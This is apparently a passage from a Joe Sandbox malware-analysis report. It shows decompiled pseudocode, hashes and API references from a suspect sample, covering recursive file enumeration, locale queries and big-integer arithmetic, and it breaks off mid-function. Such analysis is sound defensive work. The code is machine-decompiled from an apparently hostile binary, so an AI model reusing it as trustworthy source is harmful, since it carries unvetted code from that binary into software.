                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID: FeaturePresentProcessor
                    • String ID:
                    • API String ID: 2325560087-3916222277
                    • Opcode ID: f043a331e1c997310255e07476b469122d5cb912b46c5d384f050b1d9b6d5342
                    • Instruction ID: 72739982e9593218ad530a5420c585a748d88bbde9622dae747a27604ba38ab8
                    • Opcode Fuzzy Hash: f043a331e1c997310255e07476b469122d5cb912b46c5d384f050b1d9b6d5342
                    • Instruction Fuzzy Hash: CA515D71901208CFEB24CFA9E98579EBBF4FB89314F24956BD419E7250D378AA40CF94
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 72%
                    			E0044E289(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16) {
                    				intOrPtr _v8;
                    				signed int _v12;
                    				intOrPtr* _v32;
                    				CHAR* _v36;
                    				signed int _v48;
                    				char _v286;
                    				signed int _v287;
                    				struct _WIN32_FIND_DATAA _v332;
                    				intOrPtr* _v336;
                    				signed int _v340;
                    				signed int _v344;
                    				intOrPtr _v372;
                    				signed int _t35;
                    				signed int _t40;
                    				signed int _t43;
                    				intOrPtr _t45;
                    				signed char _t47;
                    				intOrPtr* _t55;
                    				union _FINDEX_INFO_LEVELS _t57;
                    				signed int _t62;
                    				signed int _t65;
                    				void* _t72;
                    				void* _t74;
                    				signed int _t75;
                    				void* _t78;
                    				CHAR* _t79;
                    				intOrPtr* _t83;
                    				intOrPtr _t85;
                    				void* _t87;
                    				intOrPtr* _t88;
                    				signed int _t92;
                    				signed int _t96;
                    				void* _t101;
                    				intOrPtr _t102;
                    				signed int _t105;
                    				union _FINDEX_INFO_LEVELS _t106;
                    				void* _t111;
                    				intOrPtr _t112;
                    				void* _t113;
                    				signed int _t118;
                    				void* _t119;
                    				signed int _t120;
                    				void* _t121;
                    				void* _t122;
                    
                    				_push(__ecx);
                    				_t83 = _a4;
                    				_t2 = _t83 + 1; // 0x1
                    				_t101 = _t2;
                    				do {
                    					_t35 =  *_t83;
                    					_t83 = _t83 + 1;
                    				} while (_t35 != 0);
                    				_push(__edi);
                    				_t105 = _a12;
                    				_t85 = _t83 - _t101 + 1;
                    				_v8 = _t85;
                    				if(_t85 <= (_t35 | 0xffffffff) - _t105) {
                    					_push(__ebx);
                    					_push(__esi);
                    					_t5 = _t105 + 1; // 0x1
                    					_t78 = _t5 + _t85;
                    					_t111 = E004454E5(_t85, _t78, 1);
                    					_pop(_t87);
                    					__eflags = _t105;
                    					if(_t105 == 0) {
                    						L6:
                    						_push(_v8);
                    						_t78 = _t78 - _t105;
                    						_t40 = E00441413(_t87, _t111 + _t105, _t78, _a4);
                    						_t120 = _t119 + 0x10;
                    						__eflags = _t40;
                    						if(__eflags != 0) {
                    							goto L9;
                    						} else {
                    							_t72 = E0044E4C8(_a16, __eflags, _t111);
                    							E00446172(0);
                    							_t74 = _t72;
                    							goto L8;
                    						}
                    					} else {
                    						_push(_t105);
                    						_t75 = E00441413(_t87, _t111, _t78, _a8);
                    						_t120 = _t119 + 0x10;
                    						__eflags = _t75;
                    						if(_t75 != 0) {
                    							L9:
                    							_push(0);
                    							_push(0);
                    							_push(0);
                    							_push(0);
                    							_push(0);
                    							E0043B6DD();
                    							asm("int3");
                    							_t118 = _t120;
                    							_t121 = _t120 - 0x150;
                    							_t43 =  *0x47000c; // 0xc3a97826
                    							_v48 = _t43 ^ _t118;
                    							_t88 = _v32;
                    							_push(_t78);
                    							_t79 = _v36;
                    							_push(_t111);
                    							_t112 = _v332.cAlternateFileName;
                    							_push(_t105);
                    							_v372 = _t112;
                    							while(1) {
                    								__eflags = _t88 - _t79;
                    								if(_t88 == _t79) {
                    									break;
                    								}
                    								_t45 =  *_t88;
                    								__eflags = _t45 - 0x2f;
                    								if(_t45 != 0x2f) {
                    									__eflags = _t45 - 0x5c;
                    									if(_t45 != 0x5c) {
                    										__eflags = _t45 - 0x3a;
                    										if(_t45 != 0x3a) {
                    											_t88 = E00455C90(_t79, _t88);
                    											continue;
                    										}
                    									}
                    								}
                    								break;
                    							}
                    							_t102 =  *_t88;
                    							__eflags = _t102 - 0x3a;
                    							if(_t102 != 0x3a) {
                    								L19:
                    								_t106 = 0;
                    								__eflags = _t102 - 0x2f;
                    								if(_t102 == 0x2f) {
                    									L23:
                    									_t47 = 1;
                    									__eflags = 1;
                    								} else {
                    									__eflags = _t102 - 0x5c;
                    									if(_t102 == 0x5c) {
                    										goto L23;
                    									} else {
                    										__eflags = _t102 - 0x3a;
                    										if(_t102 == 0x3a) {
                    											goto L23;
                    										} else {
                    											_t47 = 0;
                    										}
                    									}
                    								}
                    								_t90 = _t88 - _t79 + 1;
                    								asm("sbb eax, eax");
                    								_v340 =  ~(_t47 & 0x000000ff) & _t88 - _t79 + 0x00000001;
                    								E004368A0(_t106,  &_v332, _t106, 0x140);
                    								_t122 = _t121 + 0xc;
                    								_t113 = FindFirstFileExA(_t79, _t106,  &_v332, _t106, _t106, _t106);
                    								_t55 = _v336;
                    								__eflags = _t113 - 0xffffffff;
                    								if(_t113 != 0xffffffff) {
                    									_t92 =  *((intOrPtr*)(_t55 + 4)) -  *_t55;
                    									__eflags = _t92;
                    									_t93 = _t92 >> 2;
                    									_v344 = _t92 >> 2;
                    									do {
                    										__eflags = _v332.cFileName - 0x2e;
                    										if(_v332.cFileName != 0x2e) {
                    											L36:
                    											_push(_t55);
                    											_t57 = E0044E289(_t79, _t93, _t106, _t113,  &(_v332.cFileName), _t79, _v340);
                    											_t122 = _t122 + 0x10;
                    											__eflags = _t57;
                    											if(_t57 != 0) {
                    												goto L26;
                    											} else {
                    												goto L37;
                    											}
                    										} else {
                    											_t93 = _v287;
                    											__eflags = _t93;
                    											if(_t93 == 0) {
                    												goto L37;
                    											} else {
                    												__eflags = _t93 - 0x2e;
                    												if(_t93 != 0x2e) {
                    													goto L36;
                    												} else {
                    													__eflags = _v286;
                    													if(_v286 == 0) {
                    														goto L37;
                    													} else {
                    														goto L36;
                    													}
                    												}
                    											}
                    										}
                    										goto L40;
                    										L37:
                    										_t62 = FindNextFileA(_t113,  &_v332);
                    										__eflags = _t62;
                    										_t55 = _v336;
                    									} while (_t62 != 0);
                    									_t103 =  *_t55;
                    									_t96 = _v344;
                    									_t65 =  *((intOrPtr*)(_t55 + 4)) -  *_t55 >> 2;
                    									__eflags = _t96 - _t65;
                    									if(_t96 != _t65) {
                    										E004409E0(_t79, _t106, _t113, _t103 + _t96 * 4, _t65 - _t96, 4, E0044E0E1);
                    									}
                    								} else {
                    									_push(_t55);
                    									_t57 = E0044E289(_t79, _t90, _t106, _t113, _t79, _t106, _t106);
                    									L26:
                    									_t106 = _t57;
                    								}
                    								__eflags = _t113 - 0xffffffff;
                    								if(_t113 != 0xffffffff) {
                    									FindClose(_t113);
                    								}
                    							} else {
                    								__eflags = _t88 -  &(_t79[1]);
                    								if(_t88 ==  &(_t79[1])) {
                    									goto L19;
                    								} else {
                    									_push(_t112);
                    									E0044E289(_t79, _t88, 0, _t112, _t79, 0, 0);
                    								}
                    							}
                    							__eflags = _v12 ^ _t118;
                    							return E004349BB(_v12 ^ _t118);
                    						} else {
                    							goto L6;
                    						}
                    					}
                    				} else {
                    					_t74 = 0xc;
                    					L8:
                    					return _t74;
                    				}
                    				L40:
                    			}















































                    0x0044e28e
                    0x0044e28f
                    0x0044e292
                    0x0044e292
                    0x0044e295
                    0x0044e295
                    0x0044e297
                    0x0044e298
                    0x0044e2a1
                    0x0044e2a2
                    0x0044e2a5
                    0x0044e2a8
                    0x0044e2ad
                    0x0044e2b4
                    0x0044e2b5
                    0x0044e2b6
                    0x0044e2b9
                    0x0044e2c3
                    0x0044e2c6
                    0x0044e2c7
                    0x0044e2c9
                    0x0044e2dd
                    0x0044e2dd
                    0x0044e2e0
                    0x0044e2ea
                    0x0044e2ef
                    0x0044e2f2
                    0x0044e2f4
                    0x00000000
                    0x0044e2f6
                    0x0044e2fa
                    0x0044e303
                    0x0044e309
                    0x00000000
                    0x0044e30c
                    0x0044e2cb
                    0x0044e2cb
                    0x0044e2d1
                    0x0044e2d6
                    0x0044e2d9
                    0x0044e2db
                    0x0044e312
                    0x0044e314
                    0x0044e315
                    0x0044e316
                    0x0044e317
                    0x0044e318
                    0x0044e319
                    0x0044e31e
                    0x0044e322
                    0x0044e324
                    0x0044e32a
                    0x0044e331
                    0x0044e334
                    0x0044e337
                    0x0044e338
                    0x0044e33b
                    0x0044e33c
                    0x0044e33f
                    0x0044e340
                    0x0044e361
                    0x0044e361
                    0x0044e363
                    0x00000000
                    0x00000000
                    0x0044e348
                    0x0044e34a
                    0x0044e34c
                    0x0044e34e
                    0x0044e350
                    0x0044e352
                    0x0044e354
                    0x0044e35f
                    0x00000000
                    0x0044e35f
                    0x0044e354
                    0x0044e350
                    0x00000000
                    0x0044e34c
                    0x0044e365
                    0x0044e367
                    0x0044e36a
                    0x0044e383
                    0x0044e383
                    0x0044e385
                    0x0044e388
                    0x0044e398
                    0x0044e39a
                    0x0044e39a
                    0x0044e38a
                    0x0044e38a
                    0x0044e38d
                    0x00000000
                    0x0044e38f
                    0x0044e38f
                    0x0044e392
                    0x00000000
                    0x0044e394
                    0x0044e394
                    0x0044e394
                    0x0044e392
                    0x0044e38d
                    0x0044e3a0
                    0x0044e3a8
                    0x0044e3ac
                    0x0044e3ba
                    0x0044e3bf
                    0x0044e3d4
                    0x0044e3d6
                    0x0044e3dc
                    0x0044e3df
                    0x0044e411
                    0x0044e411
                    0x0044e413
                    0x0044e416
                    0x0044e41c
                    0x0044e41c
                    0x0044e423
                    0x0044e43d
                    0x0044e43d
                    0x0044e44c
                    0x0044e451
                    0x0044e454
                    0x0044e456
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0044e425
                    0x0044e425
                    0x0044e42b
                    0x0044e42d
                    0x00000000
                    0x0044e42f
                    0x0044e42f
                    0x0044e432
                    0x00000000
                    0x0044e434
                    0x0044e434
                    0x0044e43b
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0044e43b
                    0x0044e432
                    0x0044e42d
                    0x00000000
                    0x0044e458
                    0x0044e460
                    0x0044e466
                    0x0044e468
                    0x0044e468
                    0x0044e470
                    0x0044e475
                    0x0044e47d
                    0x0044e480
                    0x0044e482
                    0x0044e496
                    0x0044e49b
                    0x0044e3e1
                    0x0044e3e1
                    0x0044e3e5
                    0x0044e3ed
                    0x0044e3ed
                    0x0044e3ed
                    0x0044e3ef
                    0x0044e3f2
                    0x0044e3f5
                    0x0044e3f5
                    0x0044e36c
                    0x0044e36f
                    0x0044e371
                    0x00000000
                    0x0044e373
                    0x0044e373
                    0x0044e379
                    0x0044e37e
                    0x0044e371
                    0x0044e402
                    0x0044e40d
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0044e2db
                    0x0044e2af
                    0x0044e2b1
                    0x0044e30d
                    0x0044e311
                    0x0044e311
                    0x00000000

                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: .
                    • API String ID: 0-248832578
                    • Opcode ID: 1155760e5bddaf09118c85162d171b8b1c1dde8e2da582757629730a8f8472d8
                    • Instruction ID: 472f3796d554d34f3116142b922fbe5a7121328f2e6bdb02a51a6a44ac63d835
                    • Opcode Fuzzy Hash: 1155760e5bddaf09118c85162d171b8b1c1dde8e2da582757629730a8f8472d8
                    • Instruction Fuzzy Hash: A1310571900209AFEB249E7ACC84EFB7BBDFB85314F1401AEF918D7251E6349E418B54
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 91%
                    			E004519AB(void* __ecx, void* __edx, signed int* _a4) {
                    				void* __ebx;
                    				void* __ebp;
                    				intOrPtr _t26;
                    				intOrPtr _t29;
                    				signed int _t32;
                    				signed char _t33;
                    				signed char _t34;
                    				void* _t36;
                    				intOrPtr* _t39;
                    				intOrPtr* _t42;
                    				signed int _t48;
                    				void* _t51;
                    				void* _t52;
                    				signed int* _t53;
                    				void* _t54;
                    				signed int _t62;
                    
                    				_t54 = E00447C05(_t36, __ecx, __edx);
                    				_t48 = 2;
                    				_t39 =  *((intOrPtr*)(_t54 + 0x50));
                    				_t51 = _t39 + 2;
                    				do {
                    					_t26 =  *_t39;
                    					_t39 = _t39 + _t48;
                    				} while (_t26 != 0);
                    				_t42 =  *((intOrPtr*)(_t54 + 0x54));
                    				 *(_t54 + 0x60) = 0 | _t39 - _t51 >> 0x00000001 == 0x00000003;
                    				_t52 = _t42 + 2;
                    				do {
                    					_t29 =  *_t42;
                    					_t42 = _t42 + _t48;
                    				} while (_t29 != 0);
                    				_t53 = _a4;
                    				 *(_t54 + 0x64) = 0 | _t42 - _t52 >> 0x00000001 == 0x00000003;
                    				_t53[1] = 0;
                    				if( *(_t54 + 0x60) == 0) {
                    					_t48 = E00451AA7( *((intOrPtr*)(_t54 + 0x50)));
                    				}
                    				 *(_t54 + 0x5c) = _t48;
                    				_t32 = EnumSystemLocalesW(E00451AD3, 1);
                    				_t62 =  *_t53 & 0x00000007;
                    				asm("bt ecx, 0x9");
                    				_t33 = _t32 & 0xffffff00 | _t62 > 0x00000000;
                    				asm("bt ecx, 0x8");
                    				_t34 = _t33 & 0xffffff00 | _t62 > 0x00000000;
                    				if((_t34 & (_t48 & 0xffffff00 | _t62 != 0x00000000) & _t33) == 0) {
                    					 *_t53 = 0;
                    					return _t34;
                    				}
                    				return _t34;
                    			}



















                    0x004519b8
                    0x004519be
                    0x004519bf
                    0x004519c2
                    0x004519c5
                    0x004519c5
                    0x004519c8
                    0x004519ca
                    0x004519d8
                    0x004519de
                    0x004519e1
                    0x004519e4
                    0x004519e4
                    0x004519e7
                    0x004519e9
                    0x004519f2
                    0x004519fd
                    0x00451a00
                    0x00451a06
                    0x00451a11
                    0x00451a11
                    0x00451a1a
                    0x00451a1d
                    0x00451a25
                    0x00451a2b
                    0x00451a2f
                    0x00451a34
                    0x00451a38
                    0x00451a3d
                    0x00451a3f
                    0x00000000
                    0x00451a3f
                    0x00451a45

                    APIs
                      • Part of subcall function 00447C05: GetLastError.KERNEL32(?,00000000,00441655,?,0041B448,-00475D04,?,?,?,?,0046B928,0040D016,.vbs), ref: 00447C09
                      • Part of subcall function 00447C05: _free.LIBCMT ref: 00447C3C
                      • Part of subcall function 00447C05: SetLastError.KERNEL32(00000000,?,0041B448,-00475D04,?,?,?,?,0046B928,0040D016,.vbs), ref: 00447C7D
                      • Part of subcall function 00447C05: _abort.LIBCMT ref: 00447C83
                    • EnumSystemLocalesW.KERNEL32(00451AD3,00000001,00000000,?,^DD,?,00452100,00000000,?,?,?), ref: 00451A1D
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorLast$EnumLocalesSystem_abort_free
                    • String ID: ^DD
                    • API String ID: 1084509184-2093471008
                    • Opcode ID: 46babfb634356c6f8a5807d8e067c084cc22d1ba866341fb4d865348ca49086b
                    • Instruction ID: d9078137204864f5a3cc5d054686674cad4957042c6adf5086356de318f67fd8
                    • Opcode Fuzzy Hash: 46babfb634356c6f8a5807d8e067c084cc22d1ba866341fb4d865348ca49086b
                    • Instruction Fuzzy Hash: F41155362007009FEB189F39D8A17BBBB92FF80329B14442EE98687B41D775BC02C744
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E00451A46(void* __ecx, void* __edx, signed char* _a4) {
                    				void* __ebx;
                    				void* __ebp;
                    				intOrPtr _t11;
                    				signed int _t13;
                    				signed char* _t15;
                    				void* _t17;
                    				intOrPtr* _t20;
                    				intOrPtr _t25;
                    				void* _t26;
                    				void* _t27;
                    
                    				_t27 = E00447C05(_t17, __ecx, __edx);
                    				_t25 = 2;
                    				_t20 =  *((intOrPtr*)(_t27 + 0x50));
                    				_t26 = _t20 + 2;
                    				do {
                    					_t11 =  *_t20;
                    					_t20 = _t20 + _t25;
                    				} while (_t11 != 0);
                    				_t13 = 0 | _t20 - _t26 >> 0x00000001 == 0x00000003;
                    				 *(_t27 + 0x60) = _t13;
                    				if(_t13 == 0) {
                    					_t25 = E00451AA7( *((intOrPtr*)(_t27 + 0x50)));
                    				}
                    				 *((intOrPtr*)(_t27 + 0x5c)) = _t25;
                    				EnumSystemLocalesW(E00451D23, 1);
                    				_t15 = _a4;
                    				if(( *_t15 & 0x00000004) == 0) {
                    					 *_t15 = 0;
                    					return _t15;
                    				}
                    				return _t15;
                    			}













                    0x00451a53
                    0x00451a59
                    0x00451a5a
                    0x00451a5d
                    0x00451a60
                    0x00451a60
                    0x00451a63
                    0x00451a65
                    0x00451a73
                    0x00451a76
                    0x00451a7b
                    0x00451a86
                    0x00451a86
                    0x00451a8f
                    0x00451a92
                    0x00451a98
                    0x00451a9e
                    0x00451aa0
                    0x00000000
                    0x00451aa0
                    0x00451aa6

                    APIs
                      • Part of subcall function 00447C05: GetLastError.KERNEL32(?,00000000,00441655,?,0041B448,-00475D04,?,?,?,?,0046B928,0040D016,.vbs), ref: 00447C09
                      • Part of subcall function 00447C05: _free.LIBCMT ref: 00447C3C
                      • Part of subcall function 00447C05: SetLastError.KERNEL32(00000000,?,0041B448,-00475D04,?,?,?,?,0046B928,0040D016,.vbs), ref: 00447C7D
                      • Part of subcall function 00447C05: _abort.LIBCMT ref: 00447C83
                    • EnumSystemLocalesW.KERNEL32(00451D23,00000001,?,?,^DD,?,004520C4,^DD,?,?,?,?,?,0044445E,?,?), ref: 00451A92
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorLast$EnumLocalesSystem_abort_free
                    • String ID: ^DD
                    • API String ID: 1084509184-2093471008
                    • Opcode ID: 1658e6e74b2b7d776e7f7a32c5be59a3927b3a6b4f9318ff7610c2ee7e73c124
                    • Instruction ID: fcbd0b1e04c1eb17585ef23ecdf74aadf97d59777de853debb21f534aed7d410
                    • Opcode Fuzzy Hash: 1658e6e74b2b7d776e7f7a32c5be59a3927b3a6b4f9318ff7610c2ee7e73c124
                    • Instruction Fuzzy Hash: 48F028367003045FD7155F359881B6B7B95EF80359F05402EFD0187651D7759C418644
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,00443EBC,?,00000004), ref: 0044834F
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID: InfoLocale
                    • String ID: GetLocaleInfoEx
                    • API String ID: 2299586839-2904428671
                    • Opcode ID: f28672a43bca25f7d73d8836dd53a994baee2c23e333aa603eed994275ea1081
                    • Instruction ID: a4ed42a774d706ca2328f06fcd00b500ff6604a077a6c3754c6a8faa3ea98536
                    • Opcode Fuzzy Hash: f28672a43bca25f7d73d8836dd53a994baee2c23e333aa603eed994275ea1081
                    • Instruction Fuzzy Hash: 37F02431601208FBEB016F62DC02F6E7F65EF04B12F10416EFC0526291DF769E11969D
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 90%
                    			E00445BE0(signed int* _a4, signed int* _a8) {
                    				signed int _v8;
                    				signed int _v12;
                    				signed int _v16;
                    				signed int _v20;
                    				signed int _v24;
                    				signed int _v28;
                    				signed int _v32;
                    				signed int _v36;
                    				signed int _v40;
                    				signed int _v44;
                    				signed int _v52;
                    				signed int _v56;
                    				signed int _v60;
                    				signed int _v64;
                    				signed int _v68;
                    				signed int _v72;
                    				signed int _v76;
                    				signed int* _v80;
                    				char _v540;
                    				signed int _v544;
                    				signed int _t197;
                    				signed int _t198;
                    				signed int* _t200;
                    				signed int _t201;
                    				signed int _t204;
                    				signed int _t206;
                    				signed int _t208;
                    				signed int _t209;
                    				signed int _t213;
                    				signed int _t219;
                    				intOrPtr _t225;
                    				void* _t228;
                    				signed int _t230;
                    				signed int _t247;
                    				signed int _t250;
                    				void* _t253;
                    				signed int _t256;
                    				signed int* _t262;
                    				signed int _t263;
                    				signed int _t264;
                    				void* _t265;
                    				intOrPtr* _t266;
                    				signed int _t267;
                    				signed int _t269;
                    				signed int _t270;
                    				signed int _t271;
                    				signed int _t272;
                    				signed int* _t274;
                    				signed int* _t278;
                    				signed int _t279;
                    				signed int _t280;
                    				intOrPtr _t282;
                    				void* _t286;
                    				signed char _t292;
                    				signed int _t295;
                    				signed int _t303;
                    				signed int _t306;
                    				signed int _t307;
                    				signed int _t309;
                    				signed int _t311;
                    				signed int _t313;
                    				intOrPtr* _t314;
                    				signed int _t318;
                    				signed int _t322;
                    				signed int* _t328;
                    				signed int _t330;
                    				signed int _t331;
                    				signed int _t333;
                    				void* _t334;
                    				signed int _t336;
                    				signed int _t338;
                    				signed int _t341;
                    				signed int _t342;
                    				signed int* _t344;
                    				signed int _t349;
                    				signed int _t351;
                    				void* _t355;
                    				signed int _t359;
                    				signed int _t360;
                    				signed int _t362;
                    				signed int* _t368;
                    				signed int* _t369;
                    				signed int* _t370;
                    				signed int* _t373;
                    
                    				_t262 = _a4;
                    				_t197 =  *_t262;
                    				if(_t197 != 0) {
                    					_t328 = _a8;
                    					_t267 =  *_t328;
                    					__eflags = _t267;
                    					if(_t267 != 0) {
                    						_t3 = _t197 - 1; // -1
                    						_t349 = _t3;
                    						_t4 = _t267 - 1; // -1
                    						_t198 = _t4;
                    						_v16 = _t349;
                    						__eflags = _t198;
                    						if(_t198 != 0) {
                    							__eflags = _t198 - _t349;
                    							if(_t198 > _t349) {
                    								L23:
                    								__eflags = 0;
                    								return 0;
                    							} else {
                    								_t46 = _t198 + 1; // 0x0
                    								_t306 = _t349 - _t198;
                    								_v60 = _t46;
                    								_t269 = _t349;
                    								__eflags = _t349 - _t306;
                    								if(_t349 < _t306) {
                    									L21:
                    									_t306 = _t306 + 1;
                    									__eflags = _t306;
                    								} else {
                    									_t368 =  &(_t262[_t349 + 1]);
                    									_t341 =  &(( &(_t328[_t269 - _t306]))[1]);
                    									__eflags = _t341;
                    									while(1) {
                    										__eflags =  *_t341 -  *_t368;
                    										if( *_t341 !=  *_t368) {
                    											break;
                    										}
                    										_t269 = _t269 - 1;
                    										_t341 = _t341 - 4;
                    										_t368 = _t368 - 4;
                    										__eflags = _t269 - _t306;
                    										if(_t269 >= _t306) {
                    											continue;
                    										} else {
                    											goto L21;
                    										}
                    										goto L22;
                    									}
                    									_t369 = _a8;
                    									_t54 = (_t269 - _t306) * 4; // 0xfc23b5a
                    									__eflags =  *((intOrPtr*)(_t369 + _t54 + 4)) -  *((intOrPtr*)(_t262 + 4 + _t269 * 4));
                    									if( *((intOrPtr*)(_t369 + _t54 + 4)) <  *((intOrPtr*)(_t262 + 4 + _t269 * 4))) {
                    										goto L21;
                    									}
                    								}
                    								L22:
                    								__eflags = _t306;
                    								if(__eflags != 0) {
                    									_t330 = _v60;
                    									_t200 = _a8;
                    									_t351 =  *(_t200 + _t330 * 4);
                    									_t64 = _t330 * 4; // 0xffff0f0a
                    									_t201 =  *((intOrPtr*)(_t200 + _t64 - 4));
                    									_v36 = _t201;
                    									asm("bsr eax, esi");
                    									_v56 = _t351;
                    									if(__eflags == 0) {
                    										_t270 = 0x20;
                    									} else {
                    										_t270 = 0x1f - _t201;
                    									}
                    									_v40 = _t270;
                    									_v64 = 0x20 - _t270;
                    									__eflags = _t270;
                    									if(_t270 != 0) {
                    										_t292 = _v40;
                    										_v36 = _v36 << _t292;
                    										_v56 = _t351 << _t292 | _v36 >> _v64;
                    										__eflags = _t330 - 2;
                    										if(_t330 > 2) {
                    											_t79 = _t330 * 4; // 0xe850ffff
                    											_t81 =  &_v36;
                    											 *_t81 = _v36 |  *(_a8 + _t79 - 8) >> _v64;
                    											__eflags =  *_t81;
                    										}
                    									}
                    									_v76 = 0;
                    									_t307 = _t306 + 0xffffffff;
                    									__eflags = _t307;
                    									_v32 = _t307;
                    									if(_t307 < 0) {
                    										_t331 = 0;
                    										__eflags = 0;
                    									} else {
                    										_t85 =  &(_t262[1]); // 0x4
                    										_v20 =  &(_t85[_t307]);
                    										_t206 = _t307 + _t330;
                    										_t90 = _t262 - 4; // -4
                    										_v12 = _t206;
                    										_t278 = _t90 + _t206 * 4;
                    										_v80 = _t278;
                    										do {
                    											__eflags = _t206 - _v16;
                    											if(_t206 > _v16) {
                    												_t207 = 0;
                    												__eflags = 0;
                    											} else {
                    												_t207 = _t278[2];
                    											}
                    											__eflags = _v40;
                    											_t311 = _t278[1];
                    											_t279 =  *_t278;
                    											_v52 = _t207;
                    											_v44 = 0;
                    											_v8 = _t207;
                    											_v24 = _t279;
                    											if(_v40 > 0) {
                    												_t318 = _v8;
                    												_t336 = _t279 >> _v64;
                    												_t230 = E00457150(_t311, _v40, _t318);
                    												_t279 = _v40;
                    												_t207 = _t318;
                    												_t311 = _t336 | _t230;
                    												_t359 = _v24 << _t279;
                    												__eflags = _v12 - 3;
                    												_v8 = _t318;
                    												_v24 = _t359;
                    												if(_v12 >= 3) {
                    													_t279 = _v64;
                    													_t360 = _t359 |  *(_t262 + (_v60 + _v32) * 4 - 8) >> _t279;
                    													__eflags = _t360;
                    													_t207 = _v8;
                    													_v24 = _t360;
                    												}
                    											}
                    											_t208 = E00456DD0(_t311, _t207, _v56, 0);
                    											_v44 = _t262;
                    											_t263 = _t208;
                    											_v44 = 0;
                    											_t209 = _t311;
                    											_v8 = _t263;
                    											_v28 = _t209;
                    											_t333 = _t279;
                    											_v72 = _t263;
                    											_v68 = _t209;
                    											__eflags = _t209;
                    											if(_t209 != 0) {
                    												L40:
                    												_t264 = _t263 + 1;
                    												asm("adc eax, 0xffffffff");
                    												_t333 = _t333 + E00456BD0(_t264, _t209, _v56, 0);
                    												asm("adc esi, edx");
                    												_t263 = _t264 | 0xffffffff;
                    												_t209 = 0;
                    												__eflags = 0;
                    												_v44 = 0;
                    												_v8 = _t263;
                    												_v72 = _t263;
                    												_v28 = 0;
                    												_v68 = 0;
                    											} else {
                    												__eflags = _t263 - 0xffffffff;
                    												if(_t263 > 0xffffffff) {
                    													goto L40;
                    												}
                    											}
                    											__eflags = 0;
                    											if(0 <= 0) {
                    												if(0 < 0) {
                    													goto L44;
                    												} else {
                    													__eflags = _t333 - 0xffffffff;
                    													if(_t333 <= 0xffffffff) {
                    														while(1) {
                    															L44:
                    															_v8 = _v24;
                    															_t228 = E00456BD0(_v36, 0, _t263, _t209);
                    															__eflags = _t311 - _t333;
                    															if(__eflags < 0) {
                    																break;
                    															}
                    															if(__eflags > 0) {
                    																L47:
                    																_t209 = _v28;
                    																_t263 = _t263 + 0xffffffff;
                    																_v72 = _t263;
                    																asm("adc eax, 0xffffffff");
                    																_t333 = _t333 + _v56;
                    																__eflags = _t333;
                    																_v28 = _t209;
                    																asm("adc dword [ebp-0x28], 0x0");
                    																_v68 = _t209;
                    																if(_t333 == 0) {
                    																	__eflags = _t333 - 0xffffffff;
                    																	if(_t333 <= 0xffffffff) {
                    																		continue;
                    																	} else {
                    																	}
                    																}
                    															} else {
                    																__eflags = _t228 - _v8;
                    																if(_t228 <= _v8) {
                    																	break;
                    																} else {
                    																	goto L47;
                    																}
                    															}
                    															L51:
                    															_v8 = _t263;
                    															goto L52;
                    														}
                    														_t209 = _v28;
                    														goto L51;
                    													}
                    												}
                    											}
                    											L52:
                    											__eflags = _t209;
                    											if(_t209 != 0) {
                    												L54:
                    												_t280 = _v60;
                    												_t334 = 0;
                    												_t355 = 0;
                    												__eflags = _t280;
                    												if(_t280 != 0) {
                    													_t266 = _v20;
                    													_t219 =  &(_a8[1]);
                    													__eflags = _t219;
                    													_v24 = _t219;
                    													_v16 = _t280;
                    													do {
                    														_v44 =  *_t219;
                    														_t225 =  *_t266;
